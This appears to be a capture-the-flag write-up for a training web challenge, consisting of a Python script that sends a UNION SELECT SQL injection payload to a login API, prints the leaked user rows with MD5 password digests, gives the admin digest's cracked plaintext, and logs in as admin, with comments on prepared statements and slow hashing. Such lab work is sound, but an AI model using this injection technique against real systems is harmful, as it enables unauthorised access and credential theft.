Wizer - Challenge 7 - SQLi

Exploit

import requests

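# Login endpoint of the Wizer CTF "Challenge 7" training application.
url = "https://chal7.vercel.app/api/login"


# Challenge statement: starting from the low-privilege account
# isaac / tifat123!, use the API to log in as admin
# (login page: https://chal7.vercel.app/).

# The API takes a two-element JSON array: element 0 is the username field and
# element 1 the password field. The username carries a UNION SELECT fragment;
# the reply recorded below also contains the admin row, which indicates the
# server splices this value into its SQL text instead of binding it.
# Defensive takeaways: bind user input as query parameters (prepared
# statements), and never return the stored password column to the client.
login_fields = [
    {"value": "isaac' UNION SELECT * FROM users WHERE type = 'admin"},
    {"value": "tifat123!"},
]

# timeout added: requests waits indefinitely by default, so an unresponsive
# host would otherwise hang the script.
r = requests.post(url, json=login_fields, timeout=10)

print(r.text)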



# Response body printed by the request above (both user rows in one reply):
# [
#   {
#     "id": 1,
#     "userName": "isaac",
#     "password": "edd0d8ceaa02de2c31c2626523805ef9",
#     "firstName": "Isaac",
#     "lastName": "Newton",
#     "type": "user"
#   },
#   {
#     "id": 2,
#     "userName": "nicky",
#     "password": "a9693501a23857134ea063218bff1f4f",
#     "firstName": "Nikola",
#     "lastName": "Tesla",
#     "type": "admin"
#   }
# ]


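# Admin row's password digest and its plaintext, as digest:plaintext. The
# 32-hex-character value looks like an unsalted MD5 digest (assumption: the
# page does not name the algorithm). Credentials should be stored with a
# salted, deliberately slow scheme such as bcrypt, scrypt or Argon2, so that a
# leaked digest does not translate directly into a usable password.
# a9693501a23857134ea063218bff1f4f:s101101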

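# Follow-up request: an ordinary login (no injection) using the admin row's
# userName from the earlier reply and the plaintext paired with its digest in
# the comment above. Same body shape as before: element 0 is the username
# field, element 1 the password field.
login_fields = [
    {"value": "nicky"},
    {"value": "s101101"},
]

# timeout added: requests waits indefinitely by default, so an unresponsive
# host would otherwise hang the script.
r = requests.post(url, json=login_fields, timeout=10)

print(r.text)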